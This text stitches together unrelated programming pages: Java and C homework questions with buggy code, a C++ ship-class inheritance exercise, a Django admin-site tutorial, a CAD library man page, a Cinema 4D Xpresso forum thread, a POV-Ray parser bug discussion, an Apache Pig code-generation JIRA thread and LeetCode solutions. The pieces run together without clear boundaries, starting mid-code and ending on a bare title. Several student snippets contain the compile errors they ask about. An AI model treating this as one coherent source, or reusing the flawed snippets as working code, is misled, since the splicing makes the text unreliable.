        for (int i = 0; i < numbers.length; i ++)
        {
            output += numbers[i] + " ";
        }
        output += "n\The average is" + average;
        output += "n\The number of values in the array greater than the average" + "is" + count;

        //Display the result
        System.out.println(output);
    }
}

errors

AverageArray.java:23: '.class' expected
float sum += numbers[i];
^
AverageArray.java:23: not a statement
float sum += numbers[i];
^
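For what it's worth, here is one way to straighten out the logic. The compiler trips on `float sum += numbers[i];` because a variable cannot be declared and compound-assigned in one statement (and sum was already declared above); `int average = float sum / TOTAL_NUMBERS;` is likewise not valid syntax. Declaring `float sum = 0;` once before the loop and writing plain `sum += numbers[i];` clears both errors. The sketch below pulls the math into helper methods (my own layout, not part of your assignment) so it's easy to check, and the comparison uses the average instead of the undefined `max`; your Scanner input loop would slot into main unchanged:

```java
public class AverageArray {

    // Average of the values in the array.
    static float average(int[] numbers) {
        float sum = 0;                 // declare once, before the loop
        for (int i = 0; i < numbers.length; i++) {
            sum += numbers[i];         // no 'float' keyword here
        }
        return sum / numbers.length;
    }

    // How many values are strictly greater than the average.
    static int countAboveAverage(int[] numbers) {
        float avg = average(numbers);
        int count = 0;
        for (int i = 0; i < numbers.length; i++) {
            if (numbers[i] > avg) {
                count++;
            }
        }
        return count;
    }

    public static void main(String[] args) {
        // Fixed demo data; your Scanner loop would fill this array instead.
        int[] numbers = {5, 4, 7, 8};
        System.out.println("The average is " + average(numbers));
        System.out.println("Values greater than the average: " + countAboveAverage(numbers));
    }
}
```

Also note the escape sequence for a newline is `"\n"`, not `"n\"`.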
Back again, with another homework problem that is stumping me. Ok, so the assignment is to design 3 classes: Ship, CruiseShip, and CargoShip.
Ship should:
member variable for the name of the ship (string)
member variable for the year the ship was built (string)
constructor and accessors and mutators
virtual print that displays the ship name and the year it was built
Cruise ship should:
be derived from the Ship class.
member variable for max. # of passengers (int)
constructor, accessors, and mutators.
A print function that overrides the print function in the base class. The cruise ship print function should display only the ship name and max # of passengers.
Cargo ship should:
be derived from the Ship class.
member variable for cargo capacity in tonnage (int)
constructor, accessors, and mutators.
print function that overrides the print function in the base class. Should only print the ship's name and capacity.
Demonstrate the classes in a program that has an array of Ship pointers. The array elements should be initialized with the addresses of dynamically allocated Ship, CruiseShip, and CargoShip objects. The program should then step through the array, calling each object's print function.
Here's my code so far:

Ship Class (ship.h):

#include <string>

class Ship
{
private:
    string name;
    string year;
public:
    Ship();

    //Overloaded Constructor
    Ship(string n, string y)
    {
        name = n;
        year = y;
    }

    //Accessors
    string getName() {return name;}
    string getyear() {return year;}

    //Mutator that gets info from user
    virtual void setInfo()
    {
        string n;
        string y;
        cout <<"Please enter the ship name: ";
        cin >>n;
        cout <<"Please enter the year the ship was built: ";
        cin >>y;
        name = n;
        year = y;
    }

    //Print info for this function
    virtual void print()
    {
        cout <<"Ship"<<endl;
        cout <<"Name: "<<name<<endl
             <<"Year Built: "<<year<<endl;
    }
};

CruiseShip.h code:

#include<string>

class CruiseShip : public Ship
{
private:
    int passengers;
public:
    CruiseShip();

    //Overloaded constructor that has inherited variables
    CruiseShip(string n, string y, int p): Ship(n,y)
    {
        passengers = p;
    }

    //Mutator that gets info from user
    virtual void setInfo()
    {
        int p;
        cout <<"Please enter the number of passengers: ";
        cin >>p;
        passengers = p;
    }

    //print function
    virtual void print()
    {
        cout <<"Cruise Ship"<<endl;
        cout <<"Name: "<<getName()<<endl
             <<"Maximum Passanger: "<<passengers<<endl;
    }
};// end of CruiseShip

CargoShip.h code:

#include<string>

class CargoShip : public Ship
{
    int capacity;
public:
    CargoShip();

    //Overloaded constructor that has inherited variables
    CargoShip(string n, string y, int t):Ship(n,y)
    {
        capacity = t;
    }

    //Mutator that gets info from user
    virtual void setInfo()
    {
        int t;
        cout <<"Please enter the cargo capacity: ";
        cin >>t;
        capacity = t;
    }

    //Print info for this class
    virtual void print()
    {
        cout <<"Cargo Ship"<<endl;
        cout <<"Name: "<<getName()<<endl
             <<"Cargo Capacity: "<<capacity<<endl;
    }
}; //end of CargoShip

Main CPP:

#include <iostream>
#include <iomanip>
#include <string>
using namespace std;

#include "ship.h"
#include "cruiseShip.h"
#include "cargoShip.h"

const int SIZE = 3;

int main()
{
    Ship *ships[SIZE] = {new Ship(), new CruiseShip(), new CargoShip()};
    int index; //Used with For loops

    for(index = 0; index < SIZE; index++)
    {
        *ships[index]->setInfo();
        cout <<endl;
    }

    for(index = 0; index < SIZE; index++)
    {
        *ships[index]->print();
        cout <<endl;
    }

    return 0;
}

The program will not compile.

Error:
Error 1 error C2100: illegal indirection Line: 17
Error 2 error C2100: illegal indirection Line 23

Any help would be great! I have been staring at this code for a few days now. Granted, much of the code is from the book examples and me trying to use it for the assignment (as most students do). So please, if my initial code needs re-working, just say so. If you can help me eliminate the errors and get the code to compile (cross fingers it works), THAT'D BE GREAT. Thanks in advance to anyone who replies with any help whatsoever. I appreciate your time and effort, as this place seems to always have someone that can help.
Set up the Django admin site The Django admin site provides a web based interface to access the database connected to a Django project. Even for experienced technical administrators, doing database CRUD (Create-Read-Update-Delete) operations directly on a database can be difficult and time consuming, given the need to issue raw SQL commands and navigate database structures. For non-technical users, doing database CRUD operations directly on a database can be daunting, if not impossible. The Django admin site fixes this problem. The Django admin site can expose all Django project related data structures linked to a database, so it's easy for experts and novices alike to perform database CRUD operations. As a Django project grows, the Django admin site can be a vital tool to administer the growing body of information in the database connected to a Django project. The Django admin site is built as a Django app, this means the only thing you need to do to set up the Django admin site is configure and install the app as any other Django app. If you're unfamiliar with the term Django app, read the previous section 'Set up content: Understand urls, templates and apps'. The Django admin site requires that you previously configure a database and also install the Django base tables. So if you still haven't done this, see the prior section 'Set up a database for a Django project'. Configure and install the Django admin site app By default, the Django admin is enabled on all Django projects. If you open a Django project's urls.py file, in the urlpatterns variable you'll see the line path('admin/', admin.site.urls). This last path definition tells Django to enable the admin site app on the /admin/ url directory (e.g.). Next, if you open the project's settings.py file and go to the INSTALLED_APPS variable. Near the top of this variable you'll also see the line django.contrib.admin which indicates the Django admin site app is enabled. 
Start the development web server by executing python manage.py runserver in Django's BASE_DIR. Open a browser on the Django admin site. You'll see a login screen like the one in Figure 1-5.

Figure 1-5. Django admin site login

Next, let's create a Django superuser or administrator to access the Django admin via the interface in Figure 1-5. To create a Django superuser you can use the createsuperuser command from manage.py as illustrated in listing 1-23.

Listing 1-23. Create Django superuser for admin interface

[user@coffeehouse ~]$ python manage.py createsuperuser
Username (leave blank to use 'admin'):
Email address: admin@coffeehouse.com
Password:
Password (again):
The password is too similar to the email address.
This password is too short. It must contain at least 8 characters.
This password is too common.
Bypass password validation and create user anyway? [y/N]:
Password:
Password (again):
Superuser created successfully.

Caution If you receive the error OperationalError - no such table: auth_user, this means the database for the Django project is still not set up properly. You'll need to run python manage.py migrate in a project's BASE_DIR so Django creates the necessary tables to keep track of users. See the previous section 'Set up a database for a Django project' for more details.

Tip By default, Django enforces that user passwords comply with a minimum level of security. For example, in listing 1-23 you can see that after the first password attempt, Django rejects the assignment with a series of error messages and forces a new attempt. You can modify these password validation rules in the AUTH_PASSWORD_VALIDATORS variable in a project's settings.py file or, as illustrated in listing 1-23, bypass this password validation.

This last process creates a superuser whose information is stored in the database connected to the Django project, specifically in the auth_user table. Now you might be asking yourself, how do you update this user's name, password or email?
While you could go straight to the database table and perform updates, this is a tortuous route; a better approach is to rely on the Django admin, which gives you a very friendly view into the database tables present in your Django project. Next, introduce the superuser username and password you just created into the interface from figure 1-5. Once you provide the superuser username and password on the admin site, you'll access the home page for the admin site illustrated in figure 1-6.

Figure 1-6. Django admin site home page

On the home page of the Django admin site illustrated in figure 1-6, click on the 'Users' link. You'll see a list of users with access to the Django project. At the moment, you'll only see the superuser you created in the past step. You can change this user's credentials (e.g. password, email, username) or add new users directly from this Django admin site screen. This flexibility to modify or add records stored in a database that's tied to a Django project is what makes the Django admin site so powerful. For example, if you develop a coffeehouse project and add apps like stores, drinks or customers, Django admin authorized users can do CRUD operations on these objects (e.g. create stores, update drinks, delete customers). This is tremendously powerful from a content management point of view, particularly for non-technical users. And most importantly, it requires little to no additional development work to enable the Django admin site on a project's apps. The Django admin site tasks presented here are just the 'tip of the iceberg' in functionality; a future chapter covers the Django admin site functionality in greater detail.

Configure and install the Django admin site docs app

The Django admin site also has its own documentation app. The Django admin site documentation app not only provides information about the operation of the admin site itself, but also includes other general documentation about Django filters for Django templates.
More importantly, the Django admin site documentation app introspects the source code for all installed project apps to present documentation on controller methods and model objects (i.e. documentation embedded in the source code of app models.py and views.py files). To install the Django admin site documentation app you first need to install the docutils Python package with the pip package manager by executing the following command: pip install docutils. Once you install the docutils package, you can proceed to install the Django admin site documentation app as any other Django app. First you must add the url to access the Django admin site documentation app. Open the project's urls.py file and add the following highlighted lines illustrated in listing 1-24:

Listing 1-24. Add Django admin docs to admin interface

from django.contrib import admin
from django.urls import path, include
from django.views.generic import TemplateView
from coffeehouse.about import views as about_views

urlpatterns = [
    path('',TemplateView.as_view(template_name='homepage.html')),
    path('about/', about_views.contact),
    path('admin/doc/', include('django.contrib.admindocs.urls')),
    path('admin/', admin.site.urls),
]

The first line imports the include method from the django.urls package, which is necessary to load the built-in urls from the admin site documentation app. Next, inside the urlpatterns list is the 'admin/doc/' path, which tells Django to enable the admin site documentation app on the /admin/doc/ url (e.g.).

Caution The admin/doc path must be declared before the admin/ path for things to work. The url definition order matters, a topic that's discussed in the next chapter.

Next, open the project's settings.py file and go to the INSTALLED_APPS variable. Near the final values in this variable add the line django.contrib.admindocs to enable the Django admin site documentation app. With the development web server running.
Open a browser on the address and you should see a page like the one in figure 1-7.

Figure 1-7. Django admin site doc home page

If you logged off the Django admin site, you'll need to log in again to access the documentation since it also requires user authentication. Once you log in, you'll be able to see the documentation home page for the Django admin site -- illustrated in figure 1-7 -- as well as the documentation on a project's controller methods and model objects.

Caution If you receive the error TemplateDoesNotExist at /admin/doc/, this means you missed a prerequisite outlined earlier: either the docutils package wasn't installed with pip install docutils or the django.contrib.admindocs package wasn't added to the INSTALLED_APPS variable in settings.py.
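To give a taste of how little code it takes to place an app's data under admin control (a topic the later admin chapter develops in detail), here is an illustrative admin.py fragment. The stores app and its Store model are hypothetical stand-ins, and the fragment only runs inside a configured Django project, so treat it as a sketch rather than project code:

```python
# stores/admin.py -- illustrative fragment; assumes a hypothetical Store
# model with name and city fields defined in stores/models.py.
from django.contrib import admin
from .models import Store

class StoreAdmin(admin.ModelAdmin):
    # Columns shown on the admin change-list page for Store records.
    list_display = ('name', 'city')
    # Adds a search box that filters stores by name.
    search_fields = ('name',)

# Expose Store CRUD operations in the admin site.
admin.site.register(Store, StoreAdmin)
```

With this in place and the app listed in INSTALLED_APPS, Store records appear on the admin home page with add/change/delete screens generated automatically.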
https://www.webforefront.com/django/setupdjangoadminsite.html
loadrdsfig.3alc - Man Page

give back a pointer to a figure

Synopsis

#include "rtlnnn.h"
void loadrdsfig( Figure, Name, Mode )
rdsfig_list *Figure;
char *Name;
char Mode;

Parameters

- Figure: Pointer to the RDS figure created.
- Name: Name of the model of the figure.
- Mode: Character indicating the status of the figure in memory. This field can take three values:
  - 'A': All the cell is loaded in RAM (the figure, its rectangles, and its instances empty).
  - 'P': Only information concerning the model interface is present, that means: connectors, the abutment box and through routes of the figure.
  - 'V': Visualization mode: everything is loaded in RAM (the figure, its rectangles, its instances and the rectangles of its instances).

Description

The loadrdsfig function loads a cell model from disk into memory. The loadrdsfig function in fact performs a call to a parser, chosen by the RDS_IN environment variable.

Return Value

The pointer to the created figure (it's the parameter 'Figure' of the loadrdsfig function).

Errors

"Rtl103.h: Unknown rds input format"
The input format defined by the unix environment variable RDS_IN is not supported by the driver (supported formats are "cif" and "gds"). Other errors can appear because the loadrdsfig function calls the cif and gds parsers.

Example

#include "mutnnn.h"
#include "rdsnnn.h"
#include "rtlnnn.h"

main()
{
    rdsfig_list *RdsFigure;

    mbkenv();
    rdsenv();
    loadrdsparam();
    /* */
    loadrdsfig( RdsFigure, "core", 'A' );
    viewrdsfig( RdsFigure );
}

See Also

librtl, getrdsfig, rdsenv, RDS_IN
https://www.mankier.com/3/loadrdsfig.3alc
Access a Xpresso node via python tag? [SOLVED]

On 22/03/2016 at 02:09, xxxxxxxx wrote:

Hey Guys ^^ So, what I want to do is to access the "Output Upper" of a Range Mapper via a Python tag. I want to use this like a multiplier with a float field from my User Data. I have tried it like this:

import c4d
def main():
    obj_ps = doc.SearchObject("Null")
    multi = obj_ps[c4d.ID_USERDATA,29]  # This is the float field
    xpresso_tag = obj_ps.GetFirstTag()
    node_master = xpresso_tag.GetNodeMaster()
    node = node_master.AllocNode(c4d.ID_OPERATOR_RANGEMAPPER)
    node[c4d.GV_RANGEMAPPER_RANGE22] = multi

I tried it like this because I only have one Range Mapper in my Xpresso, but this doesn't seem to be working. Well, it actually does nothing at all, but I don't get an error or anything. So yeah, is it actually possible, or am I just too stupid to get it right? Thanks in advance, neon

On 22/03/2016 at 03:21, xxxxxxxx wrote:

Hello, in your code you are not accessing an existing node. You are allocating a new node (AllocNode), and that node is not inserted into anything. So if you are searching for a specific node, you have to get the root node (GetRoot()) and search its child nodes for the node you want to edit.

node_master = xpresso_tag.GetNodeMaster()
if node_master is None:
    return
root = node_master.GetRoot()
if root is None:
    return
first = root.GetDown()
if first is not None:
    if first.GetOperatorID() == c4d.ID_OPERATOR_RANGEMAPPER:
        first[c4d.GV_RANGEMAPPER_RANGE22] = 123

Best wishes, Sebastian

On 01/04/2016 at 09:20, xxxxxxxx wrote:

Hello Neon, was your question answered? Best wishes, Sebastian

On 01/04/2016 at 10:37, xxxxxxxx wrote:

Hello Sebastian, yes it was! I actually thought I had already written a reply to your answer, I am sorry. Greetings, neon
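Note that Sebastian's snippet only inspects the first child of the root. To find a Range Mapper anywhere among the root's direct children, you can walk the sibling chain with GetNext(). The stub Node class below only mimics the relevant part of the c4d node API so the traversal pattern can be shown outside Cinema 4D (the numeric ID is a made-up placeholder); inside a real Python tag you would call the same methods on the actual c4d nodes:

```python
RANGEMAPPER = 1019254  # placeholder value standing in for c4d.ID_OPERATOR_RANGEMAPPER

class Node:
    """Minimal stub mimicking the GetNext()/GetOperatorID() part of the c4d node API."""
    def __init__(self, op_id, next_node=None):
        self._op_id = op_id
        self._next = next_node

    def GetOperatorID(self):
        return self._op_id

    def GetNext(self):
        return self._next

def find_operator(first, op_id):
    """Walk the sibling chain starting at `first`, returning the first matching node."""
    node = first
    while node is not None:
        if node.GetOperatorID() == op_id:
            return node
        node = node.GetNext()
    return None

# chain of three siblings: two other operators, then the Range Mapper
chain = Node(1, Node(2, Node(RANGEMAPPER)))
found = find_operator(chain, RANGEMAPPER)
```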
https://plugincafe.maxon.net/topic/9409/12598_access-a-xpresso-node-via-python-tag-solved/1
> If .

Well, looking at the code of `IsEndOfInvokedMacro()` again, it _strongly_ reeks of scenario (A):

return (Cond_Stack.back().PMac->endPosition == CurrentFilePosition()) &&
       (Cond_Stack.back().PMac->source.fileName == mTokenizer.GetInputStreamName());

should probably be swapped around, like so:

return (Cond_Stack.back().PMac->source.fileName == mTokenizer.GetInputStreamName()) &&
       (Cond_Stack.back().PMac->endPosition == CurrentFilePosition());

so that the `LexemePosition` comparison operator is only invoked if the file names match. I guess you got really lucky in your test (and the OP unlucky in their use case), in that you happen to have created the following scenario:

- A macro is invoked.
- That macro includes a different file.
- That included file happens to have a `#` (e.g. `#declare`) at the same file offset as the `#end` of the macro.
- However, the `#` happens to be in a different line and/or column.

In such a scenario, encountering the `#`, the parser would first test whether this is the `#end` of the macro it has been waiting for, calling `IsEndOfInvokedMacro()`. `IsEndOfInvokedMacro()` in turn would check whether the current file position matches that of the macro's `#end` by calling `LexemePosition::operator==`. `LexemePosition::operator==` in turn would find that the file position does match. It would then verify that the match is also reflected in the line and column, find that they differ, and report this inconsistency via an exception. `IsEndOfInvokedMacro()` wouldn't even get a chance to test whether it is looking at the right file, because its author (duh, I wonder who that stupid git might have been...) chose to do the two tests in the wrong order. Now aside from the stupid git who authored `IsEndOfInvokedMacro()` there's someone else to blame for the situation, namely whoever thought it was a good idea to keep the stack of include files separate from the stack of pending "conditions".
If they were using one and the same structure, having `INVOKING_MACRO_COND` on top of the stack would imply that we're in the file with the `#end`, and the file name test would be redundant. I think it should be possible to merge the include stack into the "condition" stack without adverse effects, but I haven't finished work on that yet. I should note that I haven't tested this hypothesis and fix for the error yet; I intend to do that as soon as I find the time, but of course you're welcome to beat me to it.
https://news.povray.org/povray.bugreports/message/%3C5c996733%241%40news.povray.org%3E/#%3C5c996733%241%40news.povray.org%3E
Tomcat Quick Start Guide

This tutorial is a quick reference for starting development with Tomcat. In this fast Tomcat JSP tutorial, you will learn all the essential steps needed to start working with Tomcat.

Comments:

Sachin Gangurde, April 4, 2012 at 1:57 PM: Plz mail to tomcat setup

madhusekhar, July 5, 2013 at 7:11: Apache tomcat server start up problem
http://www.roseindia.net/discussion/24206-Tomcat-Quick-Start-Guide.html
Details

Description

This is basically to cut my teeth for much more ambitious code generation down the line, but I think it could be performant and useful. The new syntax is:

a = load 'thing' as (x:chararray);
define concat InvokerGenerator('java.lang.String','concat','String');
define valueOf InvokerGenerator('java.lang.Integer','valueOf','String');
define valueOfRadix InvokerGenerator('java.lang.Integer','valueOf','String,int');
b = foreach a generate x, valueOf(x) as vOf;
c = foreach b generate x, vOf, valueOfRadix(x, 16) as vOfR;
d = foreach c generate x, vOf, vOfR, concat(concat(x, (chararray)vOf), (chararray)vOfR);
dump d;

There are some differences between this version and Dmitriy's implementation:
- It is no longer necessary to declare whether the method is static or not. This is gleaned via reflection.
- As per the above, it is no longer necessary to make the first argument be the type of the object to invoke the method on. If it is not a static method, then the type will implicitly be the type you need. So in the case of concat, it would need to be passed a tuple of two inputs: one for the method to be called against (as it is not static), and then the 'String' that was specified. In the case of valueOf, because it IS static, the 'String' is the only value.
- The arguments are type sensitive. Integer means the object Integer, whereas int (or long, or float, or boolean, etc.) refers to the primitive. This is necessary to properly reflect the arguments. Values passed in WILL, however, be properly unboxed as necessary.
- The return type will be reflected.

This uses the ASM API to generate the bytecode, and then a custom classloader to load it in. I will add caching of the generated code based on the input strings, etc., but I wanted to get eyes and opinions on this. I also need to benchmark, but it should be native speed (excluding a little startup time to generate the bytecode, but ASM is really fast).
Another nice benefit is that this bypasses the need for the JDK, though it adds a dependency on ASM (which is a super tiny dependency). Patch incoming. Issue Links Activity Jon, the problem with non-static methods was that what people really wanted was to be able to construct the object to call methods on (as opposed to just invoking the no-arg constructor for every invocation). Any thoughts on how to achieve that? I'm not quite sure what you mean...could you illustrate it with a quick code snippet? I am thinking about this and what I think you mean, is that if you say define concat InvokerGenerator('java.lang.String','concat','String') you don't want it to do: return new String().concat((String)input.get(0)); So what it does is it uses the argument list (the 3rd parameter) to find a matching method. If it is not static, then it will expect n+1 arguments, where the 1st one will be an instance of the object on the left (in the case java.lang.String) which will serve as a method receiver. So in the case of concat, it would expect 2 Strings. If it is static, it only expects the argument list. Is that what you were talking about, or something else? Not quite – what I mean is that people want to be able to say, effectively: Foo foo = new Foo(1, 2, 'some_string'); for (Tuple t : tuples) { foo.someMethod(t); } I think the problem with invokers isn't that they are slow. It's that they are cumbersome to use. Not sure making them faster is really the place to focus.. integrating them deeper would be interesting (why can't we just see that you are saying java.lang.String.concat('foo', $1) and auto-generate or auto-wrap a UDF?). Ah, ok. Well, first, since we have a more performance, less verbose syntax (mainly not having to say "InvokeForLong" vs "InvokeForString" and so on), I think it's worth including it because it IS faster and cleaner, though I agree that the focus now should be on filling a niche that doesn't currently exist. 
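The static vs. non-static dispatch rule just described can be sketched with plain reflection (the actual patch generates bytecode with ASM to avoid this per-call overhead; the class below is only an illustration, not code from the patch):

```java
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;

// Sketch of the dispatch rule: a static method consumes exactly the declared
// arguments; an instance method treats the first input as the receiver.
class InvokeSketch {
    static Object invoke(Class<?> cls, String name, Class<?>[] sig, Object[] inputs) {
        try {
            Method m = cls.getMethod(name, sig);
            if (Modifier.isStatic(m.getModifiers())) {
                // static: inputs map one-to-one onto the declared parameters
                return m.invoke(null, inputs);
            }
            // non-static: first input is the object to invoke the method on
            Object receiver = inputs[0];
            Object[] args = new Object[inputs.length - 1];
            System.arraycopy(inputs, 1, args, 0, args.length);
            return m.invoke(receiver, args);
        } catch (ReflectiveOperationException e) {
            throw new RuntimeException(e);
        }
    }
}
```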
As I said before, the work so far was in a big part to be a small project to begin to work with ASM with, and benefit pig on the side. I do like the idea of potentially supporting math function syntax, and then behind the scenes generating the scaffolding. I like that idea a lot. Will mull on how it'd be implemented. Perhaps a first pass would be to support a MATH keyword where if you do MATH.operator(stuff, stuff) it generates the scaffolding, and then it can get more generic? I don't really know how to do this without adding keywords... hmm hmm hmm. Would love thoughts in that vein. But what you bring up is an interesting use case...sort of the generation of UDF's based on some class that exists. What your proposing sounds like we could generate an accumulator UDF that would apply to any case where you have an object that you instantiate on the mapper, then stream everything through and return. Ideally we'd provide an interface that objects could implement that would serve as the bridge. Perhaps something like public Object eval(Object... o) throws IOException; that way they don't even have to depend on pig in the object? I'm a bit confused about the math keyword stuff. I meant just generically being able to invoke (or generate code that wraps) methods on objects, the way one would initialize an object inside a UDF constructor and then call methods on that method during UDF exec methods. what about this? - call of a static method the same way a non-defined UDF can be: a = load 'thing' as (x:long); b = foreach a generate java.lang.Math.sqrt(x) as sqrt; - definition of a UDF through an expression (for a strict definition of those expressions). 
c = load 'thing' as (x:bag{t:(v:chararray)});
DEFINE join com.google.common.base.Joiner.on('-').skipNulls().join;
d = foreach c generate join(x);

An expression being defined as follows:

{class}.{static method|constructor}([{primitive value}[,{primitive value}]*])[.{method}([{primitive value}[,{primitive value}]*])]*.{method}

The exact method to use can be evaluated through reflection using the expression and input schema.
- For methods called on the incoming objects (ex: concat) there is a finite set of those, as they are the methods available on the types supported by Pig; they can just all be defined as builtins once and for all. That would simplify the other cases above.

I don't know that I like including all of the methods for types supported by Pig...if anything, I think we should try and move towards a solution that requires less code like that. Why cruft up the code base with a bunch of wrappers? In that vein, I really like your first proposal. I think it's definitely the direction we should go. As far as a syntax to allow people to call methods that require an object, how about:

a = load 'thing' as (a:chararray, b:chararray);
b = foreach a generate a:sqrt(b) as sqrt;

I'd love to use $, but I see the potential for namespace collision to be too great, not to mention ambiguity on the parser. It doesn't have to be : of course, but I don't think . will work. But perhaps I'm wrong? Either way, I think this is one of those cases where we should shoot for a really usable syntax. In both of these cases, we could use the InvokerGenerator and reflection to figure out all of the necessary code. As far as the definition of the UDF, I think that the mentioned approach is not a bad one.
Another possibility:

c = load 'thing' as (x:bag{t:(v:chararray)});
DEFINE joiner NEW com.google.common.base.Joiner.on('-').skipNulls();
d = foreach c generate joiner:join(x);

This would introduce a new keyword which would allow us to more succinctly reference one object with various methods we want to use. The define would register this string in the namespace, and then when we see a :, first we see if what is to the left is a relation, then we see if it is in the object space. If it is, then we can build up the UDF. I think we're heading in the right direction, whatever we choose. Also, as an aside, I think it'd be awesome to make it so people didn't have to use the fully qualified classname, at least for stuff in java.lang... is there a reason why java.lang can't be added to the list returned by PigContext.getPackageImportList()? I suppose people can add it to the pig properties or whatever, but it seems like an intelligent base, at least?

Love Julien's proposal, that reads like what I expect it to read. Except at some point down that road we discover ourselves writing Java without IDE support.. Is supporting chaining method calls a bit much? Jon, I'm not following your bit of sample syntax with the ":" – possibly due to variable collision (is "a" a defined object, or a relation?)

I was worried about the "writing Java without IDE support" issue, but I think as long as our scope is narrow, the win is worth it. I like Julien's proposal as well, but I guess I feel like we might as well push it to the next level?

DEFINE join com.google.common.base.Joiner.on('-').skipNulls().join;
d = foreach c generate join(x);

The hanging "join" at the end of the define statement seems odd to me. Why not just let people call whatever method they want? And Dmitriy, I guess the ":" syntax is a little awkward, but the idea is that if you had "relation:method(relation*)", it would invoke that method on the relation with the appropriate arguments.
Or, in the same vein, if you had "joiner:join(relation*)", it'd invoke the method on the object that will be created via the DEFINE statement. I think some sort of syntax allowing us to call methods of various Pig types directly would be pretty neat, though. The syntax could be something bigger to highlight that it's kind of a big thing. "joiner=>join(relation*)", I dunno.

Another thought for this sort of thing: this might be achievable without bytecode generation and with good performance via Java 7 MethodHandles [1][2]. Of course, that would require Java 7, but Java 6 support ends later this year [3], about the time Pig 0.11 would be out anyway.

[1] [2] [3]

Scott, good idea, but moving Pig to Java 7 would require running on a Hadoop that's running on Java 7... that might take a while. Though I think Oracle's working on figuring out what that would take, now that they have a Hadoop integration team.

this will go in a future version

I don't know why this never got +1'd, I think we got derailed by the conversation near the end. I have updated it and added some tests. I don't see why we shouldn't commit this? It's strictly better than what we have, and I will make a new JIRA for the broader issue of trying to get rid of having to make a builtin for everything. Oh, I also should add tests. Can leverage the tests Dmitriy used for his.
https://issues.apache.org/jira/browse/PIG-2643?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
This is the assignment I'm doing. Write a program that reads integer data from the standard input unit and prints a list of the numbers followed by the minimum integer read, maximum integer read, and the average of that list. Test your program with the data shown below. {24 7 31 -5 64 0 57 -23 7 63 31 15 7 -3 2 4 6} This is C programming btw. Now I think I know basically what to do: the program needs an input device, and then the program loops over all the data input until there's nothing left to input. You would use an address like int x; and as you cycle through the numbers, if the number you're looking at is greater (or less than, depending on which function you're doing) it gets put in the int x slot, then you print out int x at the end. My big problem is I don't know an input device that lets you put in any amount of integers. I could use scanf(); and scan a predetermined amount of integers, but I'm not sure if there's some way to tweak scanf or if there's some command I missed when I didn't attend the lecture. Also, I'm not sure how I would make my program quit looping after it has evaluated all the numbers; like I said before, if I knew that there were 5 integers being evaluated I could set a counter to decrease by one so that when the counter hits 0 the loop ends. Is there some way I can do this where the counter changes based on the number of integers input? I hate programming so coming here makes it as painless as possible for me. Looking through the book, this is what I've pieced together so far; I'm pretty sure it doesn't work, it's not close to done anyway.
I'll be looking here from time to time most of the night, thanks in advance for any help.

Code:
#include <stdio.h>
#include <stdlib.h>

int main()
{
    int avg;
    int max;
    int min;
    int x;
    int newent;

    printf("\nEnter your integers: <EOF> to stop\n");
    newent = scanf("%d", &x);
    if (newent > max)
        max = newent;
    if (newent < min)
        min = newent;
    printf("Your average is: %d \n Your maximum is: %d \n Your minumum is: %d \n", avg, max, min);
    system("PAUSE");
    return 0;
}
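For what it's worth, both questions here (reading an unknown number of integers, and knowing when to stop) are answered by scanf's return value: it returns 1 each time it successfully reads one integer, and something else at end of input. A sketch of that approach (function and variable names are my own, not from any textbook):

```c
#include <limits.h>
#include <stdio.h>

/* Running statistics over a list of integers. */
struct stats {
    int min;
    int max;
    double avg;
};

/* Compute min/max/average of the n integers in a[]. */
struct stats compute_stats(const int *a, int n)
{
    struct stats s = { INT_MAX, INT_MIN, 0.0 };
    long sum = 0;
    for (int i = 0; i < n; i++) {
        if (a[i] < s.min) s.min = a[i];
        if (a[i] > s.max) s.max = a[i];
        sum += a[i];
    }
    if (n > 0)
        s.avg = (double)sum / n;
    return s;
}

/* Read integers from stdin until EOF or bad input; returns how many were read.
   The loop condition is the key trick: scanf returns 1 per successful read. */
int read_ints(int *a, int cap)
{
    int n = 0, x;
    while (n < cap && scanf("%d", &x) == 1)
        a[n++] = x;
    return n;
}
```

With this shape, no counter is needed up front: you count the numbers as they arrive and stop when scanf stops succeeding.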
http://cboard.cprogramming.com/c-programming/87948-need-some-help-coding-printable-thread.html
We spend O(n) time on padding each row, resulting in an O(n * rows)-time solution. Here, n denotes the number of words in the sentence.

Conceptually, each row consists of the following three parts:
- a nullable suffix of the given list, followed by
- as many complete copies of the given list as fit, followed by
- a nullable proper prefix of the given list

Parts 1 and 3 can be handled by brute force in O(n) time, and part 2 can be done in O(1) time via a division after we pre-compute the total length of the sentences. Therefore, the overall runtime is O(n * rows).

public class Solution {
    public int wordsTyping(String[] sentence, int rows, int cols) {
        int sum = 0, ans = 0, which = 0;
        for (String s : sentence) sum += s.length();
        for (int i = 0; i < rows; i++) {
            int remaining = cols + 1; // reserve an extra space for the dummy space to the left of the first letter
            while (which < sentence.length && sentence[which].length() + 1 <= remaining)
                remaining -= sentence[which++].length() + 1;
            if (which >= sentence.length) {
                which = 0;
                ans = ans + 1 + remaining / (sum + sentence.length);
                remaining %= sum + sentence.length;
                while (which < sentence.length && sentence[which].length() + 1 <= remaining)
                    remaining -= sentence[which++].length() + 1;
            }
        }
        return ans;
    }
}

Nice solution!
Just for a little bit of simplicity, there's no need for the suffix and prefix handling (the first while loop inside the for loop); just count how many whole lengths fit and start from the last index. See my C++ code:

class Solution {
public:
    int wordsTyping(vector<string>& sentence, int rows, int cols) {
        int sum = 0;
        for (auto s: sentence) {
            if (s.size() > cols) {
                return 0;
            }
            sum += s.size() + 1;
        }
        int length = sentence.size();
        int index = 0, count = 0;
        for (int i = 0; i < rows; i++) {
            int locations = cols + 1;
            count += locations / sum;
            locations %= sum;
            while (locations >= sentence[index].size() + 1) {
                locations -= sentence[index++].size() + 1;
                if (index == length) {
                    count++;
                    index = 0;
                }
            }
        }
        return count;
    }
};
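A brute-force simulation (placing one word at a time) is also handy for sanity-checking the optimized solutions above on small inputs; this sketch is my own, not from the thread:

```java
// Brute-force check: walk the grid word by word; ans counts completed passes
// over the sentence. O(rows * words-per-row), so only suitable for small inputs.
class BruteForce {
    static int wordsTyping(String[] sentence, int rows, int cols) {
        int ans = 0, i = 0;
        for (int r = 0; r < rows; r++) {
            int rem = cols;
            while (rem >= sentence[i].length()) {
                rem -= sentence[i].length() + 1; // the word plus one trailing space
                i++;
                if (i == sentence.length) {
                    i = 0;
                    ans++; // finished one full pass over the sentence
                }
            }
        }
        return ans;
    }
}
```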
https://discuss.leetcode.com/topic/62297/a-simple-simulation
How To Mask a Sprite with Cocos2D 2.0

